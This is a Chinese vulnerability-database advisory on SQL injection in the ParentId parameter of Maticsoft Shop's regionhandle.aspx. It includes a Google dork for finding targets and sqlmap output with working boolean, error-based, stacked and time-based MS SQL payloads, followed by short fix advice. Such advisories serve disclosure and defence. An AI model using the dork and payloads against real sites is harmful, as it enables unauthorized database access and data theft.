|maticsoft Shop商城系统 regionhandle.aspx... - VULHUB开源网络安全威胁库

maticsoft Shop商城系统 regionhandle.aspx...

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

动软商城系统是一套集CMS资讯+独立商城+微信商城+手机APP+SNS用户社区于一体的全新电商营销解决方案。主要为企业树立企业品牌形象，实现独立网络推广，充分利用网站SEO、微博、APP，微信等移动客户端多渠道网络营销手段，为您搭建一个全新的营销渠道。官方主页： http://www.maticsoft.com/ ![](https://images.seebug.org/contribute/2b16d26a-43ba-4e38-8e79-126d975ddad4-2016-01-19 14_00_19.jpg) Google Dork：MaticsoftFK ![](https://images.seebug.org/contribute/82af945b-ddfe-4fe8-8c0c-88dbdf7a7fcd-2016-01-19 14_01_37.jpg) ### 0x02 漏洞细节通用注入 http://shop1.maticsoft.cn/regionhandle.aspx 页面中 ParentId 过滤不严，造成post注入 sqlmap过程： ``` Place: POST Parameter: ParentId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Action=GetChildNode&ParentId=214 AND 2697=2697 Vector: AND [INFERENCE] Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Action=GetChildNode&ParentId=214 AND 7244=CONVERT(INT,(CHAR(58)+CHAR(104)+CHAR(102)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (7244=7244) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(120)+CHAR(114)+CHAR(121)+CHAR(58))) Vector: AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Action=GetChildNode&ParentId=214; WAITFOR DELAY '0:0:5';-- Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Action=GetChildNode&ParentId=214 WAITFOR DELAY '0:0:5'-- Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- ``` 示例： ![](https://images.seebug.org/contribute/ef24c6e6-227a-4db5-86c8-a27818ab1180-2016-01-19 12_52_23.jpg) ![](https://images.seebug.org/contribute/50792daf-3ac0-45f3-aacc-40ef7926b25f-2016-01-19 12_52_53.jpg) ### 0x03 修复方案 1、过滤 regionhandle.aspx 文件 ParentId 参数 2、使用加速乐等防护产品

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™